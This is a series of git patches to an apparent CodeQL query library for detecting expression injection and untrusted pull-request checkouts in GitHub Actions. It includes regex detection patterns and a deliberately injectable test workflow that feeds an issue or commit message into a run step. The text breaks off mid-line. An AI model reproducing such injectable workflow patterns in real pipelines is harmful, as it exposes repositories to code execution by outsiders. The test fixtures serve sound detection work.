@@ predicate containsHeadRef(string s) { "\\bgithub\\.event\\.workflow_run\\.head_commit\\.id\\b", // The SHA of the head commit. "\\bgithub\\.event\\.workflow_run\\.head_sha\\b", // The SHA of the head commit. "\\benv\\.GITHUB_HEAD_REF\\b", + + "\\bgithub\\.event\\.check_suite\\.after\\b", + "\\bgithub\\.event\\.check_suite\\.head_sha\\b", + "\\bgithub\\.event\\.check_suite\\.pull_requests\\[\\d+\\]\\.head\\.ref\\b", + "\\bgithub\\.event\\.check_suite\\.pull_requests\\[\\d+\\]\\.head\\.sha\\b", + "\\bgithub\\.event\\.check_suite\\.pull_requests\\[\\d+\\]\\.id\\b", + "\\bgithub\\.event\\.check_suite\\.pull_requests\\[\\d+\\]\\.number\\b", + + "\\bgithub\\.event\\.check_run\\.check_suite\\.after\\b", + "\\bgithub\\.event\\.check_run\\.check_suite\\.head_sha\\b", + "\\bgithub\\.event\\.check_run\\.check_suite\\.pull_requests\\[\\d+\\]\\.head\\.ref\\b", + "\\bgithub\\.event\\.check_run\\.check_suite\\.pull_requests\\[\\d+\\]\\.head\\.sha\\b", + "\\bgithub\\.event\\.check_run\\.check_suite\\.pull_requests\\[\\d+\\]\\.id\\b", + "\\bgithub\\.event\\.check_run\\.check_suite\\.pull_requests\\[\\d+\\]\\.number\\b", + + "\\bgithub\\.event\\.check_run\\.head_sha\\b", + "\\bgithub\\.event\\.check_run\\.pull_requests\\[\\d+\\]\\.head\\.ref\\b", + "\\bgithub\\.event\\.check_run\\.pull_requests\\[\\d+\\]\\.head\\.sha\\b", + "\\bgithub\\.event\\.check_run\\.pull_requests\\[\\d+\\]\\.id\\b", + "\\bgithub\\.event\\.check_run\\.pull_requests\\[\\d+\\]\\.number\\b", ], _, _) ) } From 3e2dffce8be696ae9a22b6605192aca3f85c728b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 14 Mar 2024 11:57:43 +0100 Subject: [PATCH 100/707] Rename ContextExpression to SimpleReferenceExpression --- ql/lib/codeql/actions/Ast.qll | 14 ++--- ql/lib/codeql/actions/ast/internal/Ast.qll | 53 ++++++++++++------- .../dataflow/internal/DataFlowPrivate.qll | 2 +- 3 files changed, 42 insertions(+), 27 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 19d1924731ab..70424a46f95b 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -226,20 +226,20 @@ class Run extends Step instanceof RunImpl { Expression getAnScriptExpr() { result = super.getAnScriptExpr() } } -abstract class ContextExpression extends AstNode instanceof ContextExpressionImpl { +abstract class SimpleReferenceExpression extends AstNode instanceof SimpleReferenceExpressionImpl { string getFieldName() { result = super.getFieldName() } AstNode getTarget() { result = super.getTarget() } } -class StepsExpression extends ContextExpression instanceof StepsExpressionImpl { } +class StepsExpression extends SimpleReferenceExpression instanceof StepsExpressionImpl { } -class NeedsExpression extends ContextExpression instanceof NeedsExpressionImpl { } +class NeedsExpression extends SimpleReferenceExpression instanceof NeedsExpressionImpl { } -class JobsExpression extends ContextExpression instanceof JobsExpressionImpl { } +class JobsExpression extends SimpleReferenceExpression instanceof JobsExpressionImpl { } -class InputsExpression extends ContextExpression instanceof InputsExpressionImpl { } +class InputsExpression extends SimpleReferenceExpression instanceof InputsExpressionImpl { } -class EnvExpression extends ContextExpression instanceof EnvExpressionImpl { } +class EnvExpression extends SimpleReferenceExpression instanceof EnvExpressionImpl { } -class MatrixExpression extends ContextExpression instanceof MatrixExpressionImpl { } +class MatrixExpression extends SimpleReferenceExpression instanceof MatrixExpressionImpl { } diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 9a97a1c45b43..1f206c964eba 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -19,24 +19,18 @@ int partialLineLengthSum(string text, int i) { result = sum(int j, int length | j in [0 .. i] and length = lineLength(text, j) | length) } -/** - * Holds if `${{ e }}` is a GitHub Actions expression evaluated within this YAML string. - * See https://docs.github.com/en/free-pro-team@latest/actions/reference/context-and-expression-syntax-for-github-actions. - * Only finds simple expressions like `${{ github.event.comment.body }}`, where the expression contains only alphanumeric characters, underscores, dots, or dashes. - * Does not identify more complicated expressions like `${{ fromJSON(env.time) }}`, or ${{ format('{{Hello {0}!}}', github.event.head_commit.author.name) }} - */ -string getASimpleReferenceExpression(YamlString s, int offset) { +string getADelimitedExpression(YamlString s, int offset) { // We use `regexpFind` to obtain *all* matches of `${{...}}`, // not just the last (greedy match) or first (reluctant match). result = s.getValue() - .regexpFind("\\$\\{\\{\\s*[A-Za-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+\\s*\\}\\}", _, offset) - .regexpCapture("(\\$\\{\\{\\s*[A-Za-z0-9'\"_\\[\\]\\*\\((\\)\\.\\-]+\\s*\\}\\})", 1) + .regexpFind("\\$\\{\\{\\s*.*\\s*\\}\\}", _, offset) + .regexpCapture("(\\$\\{\\{\\s*.*\\s*\\}\\})", 1) } private newtype TAstNode = TExpressionNode(YamlNode key, YamlScalar value, string raw, int exprOffset) { - raw = getASimpleReferenceExpression(value, exprOffset) and + raw = getADelimitedExpression(value, exprOffset) and exists(YamlMapping m | ( exists(int i | value = m.getValueNode(i) and key = m.getKeyNode(i)) @@ -789,11 +783,29 @@ class RunImpl extends StepImpl { } } +/** + * Holds if `${{ e }}` is a GitHub Actions expression evaluated within this YAML string. + * See https://docs.github.com/en/free-pro-team@latest/actions/reference/context-and-expression-syntax-for-github-actions. + * Only finds simple expressions like `${{ github.event.comment.body }}`, where the expression contains only alphanumeric characters, underscores, dots, or dashes. + * Does not identify more complicated expressions like `${{ fromJSON(env.time) }}`, or ${{ format('{{Hello {0}!}}', github.event.head_commit.author.name) }} + */ +bindingset[s] +string getASimpleReferenceExpression(string s, int offset) { + // We use `regexpFind` to obtain *all* matches of `${{...}}`, + // not just the last (greedy match) or first (reluctant match). + result = + s.trim() + .regexpFind("[A-Za-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+", _, offset) + .regexpCapture("([A-Za-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+)", 1) +} + /** * A ${{}} expression accessing a context variable such as steps, needs, jobs, env, inputs, or matrix. * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability */ -abstract class ContextExpressionImpl extends ExpressionImpl { +abstract class SimpleReferenceExpressionImpl extends ExpressionImpl { + SimpleReferenceExpressionImpl() { exists(getASimpleReferenceExpression(expression, _)) } + abstract string getFieldName(); abstract AstNodeImpl getTarget(); @@ -829,7 +841,7 @@ private string wrapRegexp(string regex) { * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability * e.g. `${{ steps.changed-files.outputs.all_changed_files }}` */ -class StepsExpressionImpl extends ContextExpressionImpl { +class StepsExpressionImpl extends SimpleReferenceExpressionImpl { string stepId; string fieldName; @@ -842,7 +854,7 @@ class StepsExpressionImpl extends ContextExpressionImpl { override string getFieldName() { result = fieldName } override AstNodeImpl getTarget() { - this.getLocation().getFile() = result.getLocation().getFile() and + this.getEnclosingJob() = result.getEnclosingJob() and result.(StepImpl).getId() = stepId } } @@ -852,7 +864,7 @@ class StepsExpressionImpl extends ContextExpressionImpl { * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability * e.g. `${{ needs.job1.outputs.foo}}` */ -class NeedsExpressionImpl extends ContextExpressionImpl { +class NeedsExpressionImpl extends SimpleReferenceExpressionImpl { JobImpl neededJob; string fieldName; @@ -866,7 +878,10 @@ class NeedsExpressionImpl extends ContextExpressionImpl { override string getFieldName() { result = fieldName } override AstNodeImpl getTarget() { - this.getEnclosingJob().getANeededJob() = neededJob and + ( + this.getEnclosingJob().getANeededJob() = neededJob or + this.getEnclosingJob() = neededJob + ) and ( // regular jobs neededJob.getOutputs() = result @@ -882,7 +897,7 @@ class NeedsExpressionImpl extends ContextExpressionImpl { * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability * e.g. `${{ jobs.job1.outputs.foo}}` (within reusable workflows) */ -class JobsExpressionImpl extends ContextExpressionImpl { +class JobsExpressionImpl extends SimpleReferenceExpressionImpl { string jobId; string fieldName; @@ -908,7 +923,7 @@ class JobsExpressionImpl extends ContextExpressionImpl { * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability * e.g. `${{ inputs.foo }}` */ -class InputsExpressionImpl extends ContextExpressionImpl { +class InputsExpressionImpl extends SimpleReferenceExpressionImpl { string fieldName; InputsExpressionImpl() { @@ -933,7 +948,7 @@ class InputsExpressionImpl extends ContextExpressionImpl { * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability * e.g. `${{ env.foo }}` */ -class EnvExpressionImpl extends ContextExpressionImpl { +class EnvExpressionImpl extends SimpleReferenceExpressionImpl { string fieldName; EnvExpressionImpl() { @@ -956,7 +971,7 @@ class EnvExpressionImpl extends ContextExpressionImpl { * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability * e.g. `${{ matrix.foo }}` */ -class MatrixExpressionImpl extends ContextExpressionImpl { +class MatrixExpressionImpl extends SimpleReferenceExpressionImpl { string fieldName; MatrixExpressionImpl() { diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index bda55da5c82a..f1657717e04f 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -271,7 +271,7 @@ predicate jumpStep(Node nodeFrom, Node nodeTo) { none() } * Holds if a Expression reads a field from a job (needs/jobs), step (steps) output via a read of `c` (fieldname) */ predicate ctxFieldReadStep(Node node1, Node node2, ContentSet c) { - exists(ContextExpression access | + exists(SimpleReferenceExpression access | ( access instanceof NeedsExpression or access instanceof StepsExpression or From 8e2c1a4f4ed140e5aae014936a19039234f81dc1 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 14 Mar 2024 11:58:07 +0100 Subject: [PATCH 101/707] Expose predicates to check local flow --- .../actions/dataflow/internal/DataFlowPublic.qll | 13 +++++++++++++ 1 file changed, 13 insertions(+) diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll index dbae273151b0..8e8ed5d92802 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll @@ -174,3 +174,16 @@ class FieldContent extends Content, TFieldContent { override string toString() { result = name } } + +predicate hasLocalFlow(Node n1, Node n2) { + simpleLocalFlowStep(n1, n2) or + exists(ContentSet c | ctxFieldReadStep(n1, n2, c)) +} + +predicate hasLocalFlowExpr(AstNode n1, AstNode n2) { + exists(Node dn1, Node dn2 | + dn1.asExpr() = n1 and + dn2.asExpr() = n2 and + hasLocalFlow(dn1, dn2) + ) +} From 03277cc24bfa901ad253f2893cc4dbb00e9ad16d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 14 Mar 2024 11:58:44 +0100 Subject: [PATCH 102/707] Add test for self-referencing jobs --- .../CWE-094/.github/workflows/self_needs.yml | 20 +++++++++++++++++++ 1 file changed, 20 insertions(+) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/self_needs.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/self_needs.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/self_needs.yml new file mode 100644 index 000000000000..afd39605bb31 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/self_needs.yml @@ -0,0 +1,20 @@ +name: Test + +on: + issue_comment: + types: [created] + +jobs: + test1: + runs-on: ubuntu-22.04 + outputs: + job_output: ${{ steps.source.outputs.value }} + steps: + - id: source + uses: mad9000/actions-find-and-replace-string@3 + with: + source: ${{ github.event['head_commit']['message'] }} + find: 'foo' + replace: '' + - run: ${{ steps.source.outputs.value }} + - run: ${{ needs.test1.outputs.job_output }} From 7160f08222691a9182870200a6451b353604d0d3 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 14 Mar 2024 12:03:40 +0100 Subject: [PATCH 103/707] Update ql/test/query-tests/Security/CWE-829/.github/workflows/auto_ci.yml MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Co-authored-by: Jaroslav LobaÄevski --- .../query-tests/Security/CWE-829/.github/workflows/auto_ci.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/auto_ci.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/auto_ci.yml index cb20cfe629bf..28ffab637f03 100644 --- a/ql/test/query-tests/Security/CWE-829/.github/workflows/auto_ci.yml +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/auto_ci.yml @@ -68,7 +68,7 @@ jobs: uses: actions/checkout@v3 with: fetch-depth: 0 - ref: ${{ github.event.pull_request.head.ref }} + ref: ${{ github.event.pull_request.head.ref || github.event.pull_request.base.ref }} repository: ${{ github.event.pull_request.head.repo.full_name }} - name: Set up Python ${{ matrix.python-version }} From 3150f24d3fc3c283df4c372925edc97800092b2d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 14 Mar 2024 12:21:16 +0100 Subject: [PATCH 104/707] Update tests and fix regexp --- ql/lib/codeql/actions/ast/internal/Ast.qll | 4 ++-- .../CWE-094/CriticalExpressionInjection.expected | 11 +++++++++++ .../Security/CWE-094/ExpressionInjection.expected | 13 +++++++++++++ 3 files changed, 26 insertions(+), 2 deletions(-) diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 1f206c964eba..ffe85b16f933 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -24,8 +24,8 @@ string getADelimitedExpression(YamlString s, int offset) { // not just the last (greedy match) or first (reluctant match). result = s.getValue() - .regexpFind("\\$\\{\\{\\s*.*\\s*\\}\\}", _, offset) - .regexpCapture("(\\$\\{\\{\\s*.*\\s*\\}\\})", 1) + .regexpFind("\\$\\{\\{\\s*[^\\}]+\\s*\\}\\}", _, offset) + .regexpCapture("(\\$\\{\\{\\s*[^\\}]+\\s*\\}\\})", 1) } private newtype TAstNode = diff --git a/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected b/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected index dfed1edb40a2..aa9d9ae2fc43 100644 --- a/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected @@ -39,6 +39,11 @@ edges | .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | | .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | | .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | +| .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | +| .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | +| .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | +| .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | +| .github/workflows/self_needs.yml:16:20:16:64 | github.event['head_commit']['message'] | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | | .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | @@ -162,6 +167,12 @@ nodes | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | semmle.label | github.event.head_commit.committer.name | | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | semmle.label | github.event.commits[11].committer.email | | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | semmle.label | github.event.commits[11].committer.name | +| .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | +| .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | semmle.label | steps.source.outputs.value | +| .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | semmle.label | Uses Step: source [value] | +| .github/workflows/self_needs.yml:16:20:16:64 | github.event['head_commit']['message'] | semmle.label | github.event['head_commit']['message'] | +| .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | semmle.label | steps.source.outputs.value | +| .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | semmle.label | needs.test1.outputs.job_output | | .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | semmle.label | Uses Step: summary [value] | | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | semmle.label | steps.summary.outputs.value | diff --git a/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected b/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected index d22e9833f521..d4fd27b18d4f 100644 --- a/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected @@ -39,6 +39,11 @@ edges | .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | | .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | | .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | +| .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | +| .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | +| .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | +| .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | +| .github/workflows/self_needs.yml:16:20:16:64 | github.event['head_commit']['message'] | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | | .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | @@ -162,6 +167,12 @@ nodes | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | semmle.label | github.event.head_commit.committer.name | | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | semmle.label | github.event.commits[11].committer.email | | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | semmle.label | github.event.commits[11].committer.name | +| .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | +| .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | semmle.label | steps.source.outputs.value | +| .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | semmle.label | Uses Step: source [value] | +| .github/workflows/self_needs.yml:16:20:16:64 | github.event['head_commit']['message'] | semmle.label | github.event['head_commit']['message'] | +| .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | semmle.label | steps.source.outputs.value | +| .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | semmle.label | needs.test1.outputs.job_output | | .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | semmle.label | Uses Step: summary [value] | | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | semmle.label | steps.summary.outputs.value | @@ -259,6 +270,8 @@ subpaths | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | ${{ github.event.head_commit.committer.name }} | | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | ${{ github.event.commits[11].committer.email }} | | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | ${{ github.event.commits[11].committer.name }} | +| .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | .github/workflows/self_needs.yml:16:20:16:64 | github.event['head_commit']['message'] | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | ${{ steps.source.outputs.value }} | +| .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | .github/workflows/self_needs.yml:16:20:16:64 | github.event['head_commit']['message'] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | ${{ needs.test1.outputs.job_output }} | | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | ${{steps.summary.outputs.value}} | | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | ${{ steps.step.outputs.value }} | | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | From 9ca1ac5bb9283d413eefc3bbb686949f69d90a4c Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 14 Mar 2024 12:58:02 +0100 Subject: [PATCH 105/707] Fix expression regexp --- ql/lib/codeql/actions/ast/internal/Ast.qll | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index ffe85b16f933..084474b40204 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -24,8 +24,9 @@ string getADelimitedExpression(YamlString s, int offset) { // not just the last (greedy match) or first (reluctant match). result = s.getValue() - .regexpFind("\\$\\{\\{\\s*[^\\}]+\\s*\\}\\}", _, offset) - .regexpCapture("(\\$\\{\\{\\s*[^\\}]+\\s*\\}\\})", 1) + .regexpFind("\\$\\{\\{(?:[^}]|}(?!}))*\\}\\}", _, offset) + .regexpCapture("(\\$\\{\\{(?:[^}]|}(?!}))*\\}\\})", 1) + .trim() } private newtype TAstNode = From 35df9519e14a43946cca042b4286477f95c96b3f Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 14 Mar 2024 12:58:47 +0100 Subject: [PATCH 106/707] Support more untrusted checkout cases --- ql/src/Security/CWE-829/UntrustedCheckout.ql | 22 ++-- .../issue_comment_3rd_party_action.yml | 53 ++++++++ .../workflows/issue_comment_direct.yml | 46 +++++++ .../workflows/issue_comment_heuristic.yml | 50 ++++++++ .../workflows/issue_comment_octokit.yml | 114 ++++++++++++++++++ .../CWE-829/UnpinnedActionsTag.expected | 6 + .../CWE-829/UntrustedCheckout.expected | 9 ++ 7 files changed, 293 insertions(+), 7 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_3rd_party_action.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_direct.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_heuristic.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_octokit.yml diff --git a/ql/src/Security/CWE-829/UntrustedCheckout.ql b/ql/src/Security/CWE-829/UntrustedCheckout.ql index 4a0a4b6ade6c..a24c80a2f607 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckout.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckout.ql @@ -14,6 +14,7 @@ */ import actions +import codeql.actions.DataFlow /** An If node that contains an actor, user or label check */ class ControlCheck extends If { @@ -23,6 +24,7 @@ class ControlCheck extends If { .regexpFind([ "\\bgithub\\.actor\\b", // actor "\\bgithub\\.triggering_actor\\b", // actor + "\\bgithub\\.event\\.comment\\.user\\.login\\b", //user "\\bgithub\\.event\\.pull_request\\.user\\.login\\b", //user "\\bgithub\\.event\\.pull_request\\.labels\\b", // label "\\bgithub\\.event\\.label\\.name\\b" // label @@ -47,22 +49,18 @@ predicate containsHeadRef(string s) { "\\bgithub\\.event\\.workflow_run\\.head_branch\\b", // The branch of the head commit. "\\bgithub\\.event\\.workflow_run\\.head_commit\\.id\\b", // The SHA of the head commit. "\\bgithub\\.event\\.workflow_run\\.head_sha\\b", // The SHA of the head commit. - "\\benv\\.GITHUB_HEAD_REF\\b", - - "\\bgithub\\.event\\.check_suite\\.after\\b", + "\\benv\\.GITHUB_HEAD_REF\\b", "\\bgithub\\.event\\.check_suite\\.after\\b", "\\bgithub\\.event\\.check_suite\\.head_sha\\b", "\\bgithub\\.event\\.check_suite\\.pull_requests\\[\\d+\\]\\.head\\.ref\\b", "\\bgithub\\.event\\.check_suite\\.pull_requests\\[\\d+\\]\\.head\\.sha\\b", "\\bgithub\\.event\\.check_suite\\.pull_requests\\[\\d+\\]\\.id\\b", "\\bgithub\\.event\\.check_suite\\.pull_requests\\[\\d+\\]\\.number\\b", - "\\bgithub\\.event\\.check_run\\.check_suite\\.after\\b", "\\bgithub\\.event\\.check_run\\.check_suite\\.head_sha\\b", "\\bgithub\\.event\\.check_run\\.check_suite\\.pull_requests\\[\\d+\\]\\.head\\.ref\\b", "\\bgithub\\.event\\.check_run\\.check_suite\\.pull_requests\\[\\d+\\]\\.head\\.sha\\b", "\\bgithub\\.event\\.check_run\\.check_suite\\.pull_requests\\[\\d+\\]\\.id\\b", "\\bgithub\\.event\\.check_run\\.check_suite\\.pull_requests\\[\\d+\\]\\.number\\b", - "\\bgithub\\.event\\.check_run\\.head_sha\\b", "\\bgithub\\.event\\.check_run\\.pull_requests\\[\\d+\\]\\.head\\.ref\\b", "\\bgithub\\.event\\.check_run\\.pull_requests\\[\\d+\\]\\.head\\.sha\\b", @@ -79,7 +77,14 @@ abstract class PRHeadCheckoutStep extends Step { } class ActionsCheckout extends PRHeadCheckoutStep instanceof UsesStep { ActionsCheckout() { this.getCallee() = "actions/checkout" and - containsHeadRef(this.getArgumentExpr("ref").getExpression()) + ( + containsHeadRef(this.getArgumentExpr("ref").getExpression()) + or + exists(UsesStep head | + head.getCallee() = ["eficode/resolve-pr-refs", "xt0rted/pull-request-comment-branch"] and + DataFlow::hasLocalFlowExpr(head, this.getArgumentExpr("ref")) + ) + ) } } @@ -103,7 +108,10 @@ class GitCheckout extends PRHeadCheckoutStep instanceof Run { from Workflow w, PRHeadCheckoutStep checkout where - w.hasTriggerEvent(["pull_request_target", "issue_comment", "pull_request_review_comment", 